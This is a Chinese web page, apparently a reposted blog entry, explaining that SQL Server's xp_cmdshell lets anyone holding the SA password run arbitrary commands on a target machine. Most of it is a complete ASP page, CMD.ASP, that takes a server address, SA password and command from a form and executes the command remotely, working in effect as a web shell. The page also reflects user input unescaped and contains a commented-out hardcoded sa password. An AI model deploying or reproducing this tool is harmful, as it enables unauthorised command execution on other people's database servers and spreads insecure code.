在线时间:8:00-16:00
迪恩网络APP
随时随地掌握行业动态
扫描二维码
关注迪恩网络微信公众号
XP_CMDSHELL存储过程是执行本机的CMD命令,要求系统登陆有SA权限,也就是说如果获得SQLSERVER的SA命令,那就可以在目标机为所欲为了,知名软件“流光”使用的应该也是这个存储过程来实现在目标机上的操作。 下面是我写的一个简单的应用页面(ASP),代码如下。 CMD.ASP <%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <title>SQLSERVER_XP_CMDSHELL实例_魔术师·刘</title> <style type="text/css"> <!-- body{ font-size:13px; line-height:20px; width:760; SCROLLBAR-FACE-COLOR: #2896e1; SCROLLBAR-SHADOW-COLOR: #6cb4d8; SCROLLBAR-ARROW-COLOR: #f0f0f0; SCROLLBAR-DARKSHADOW-COLOR: #2896e1; SCROLLBAR-BASE-COLOR: #2896e1; background-image: url(images/bg.gif); } .LBR{ border-top:0px solid #336699; border-left:1px solid #336699; border-right:1px solid #336699; border-bottom:1px solid #336699; } .all_h { border: 1px solid #336699; } .input { border: 1px solid #336699; background-color:#ECEAFD; } .LB{ border-top:0px solid #336699; border-left:1px solid #336699; border-right:0px solid #336699; border-bottom:1px solid #336699; } .N1 {font-weight:bold;color:#339933;font-size:13px;} .N2 {font-weight:bold;color:#ff0000;font-size:13px;} --> </style> </head> <body> <%if request("cmd")<>"" then%> <table width=400 border=0 align=center cellpadding=5 cellspacing=0> <tr align=center> <td height=30 class=all_h bgcolor=#B3E0FF ><span class=N1>XP_CMDSHELL请求结果</span></td> </tr> <% dim connstr,conn,rs,i ConnStr="Provider=sqloledb.1;persist security info=false;server="&request("server")&";uid=sa;pwd="&request("pwd")&";database=master" 'ConnStr="Provider=sqloledb.1;persist security info=false;server=(local);uid=sa;pwd=www.zhi.net;database=master" set conn=Server.CreateObject("ADODB.Connection") conn.open Connstr set rs=server.CreateObject("ADODB.Recordset") set rs=conn.execute("xp_cmdshell '"&replace(replace(request("cmd"),"'","''"),chr(34),"''")&"'") i=0 while not rs.eof if not isnull(rs(0)) then if i mod 2 =0 then response.Write "<tr><td class=""LBR"" bgcolor=""#DEF3FF"">"&rs(0)&"</td></tr>" else response.Write "<tr><td class=""LBR"">"&rs(0)&"</td></tr>" end if i=i 1 end if rs.movenext wend rs.close set rs=nothing conn.close set conn=nothing %> </table> <%end if%> <form name="form1" method="post" action=""> <table width=400 border=0 align=center cellpadding=5 cellspacing=0> <tr align=center> <td height=30 colspan=2 class=all_h bgcolor=#B3E0FF ><span class=N1>XP_CMDSHELL实例</span></td> </tr> <tr align=center bgcolor=#DEF3FF> <td width=26% class=LB><strong>服务器</strong></td> <td width=74% class=LBR><div align="left"> <input name="Server" type="text" id="Server" class="input" size="20" value="<%=request("Server")%>"> </div></td> </tr> <tr align=center > <td class=LB><b>SA密码 </b></td> <td class=LBR><div align="left"><span class=N1> <input name="PWD" type="text" id="PWD" class="input" size="20" value="<%=request("PWD")%>"> </span></div></td> </tr> <tr align=center bgcolor=#DEF3FF> <td width=26% class=LB><strong>CMD命令</strong></td> <td width=74% class=LBR><div align="left"> <input name="CMD" type="text" id="CMD" class="input" size="20" value="<%=request("CMD")%>"> </div></td> </tr> <tr align=center > <td colspan="2" class=LBR><div align="center"><b> </b> <input type="submit" name="Submit" value=" 提交Command命令 " class="input"> </div></td> </tr> </table> </form> </body> </html> |
2023-10-27
2022-08-15
2022-08-17
2022-09-23
2022-08-13
请发表评论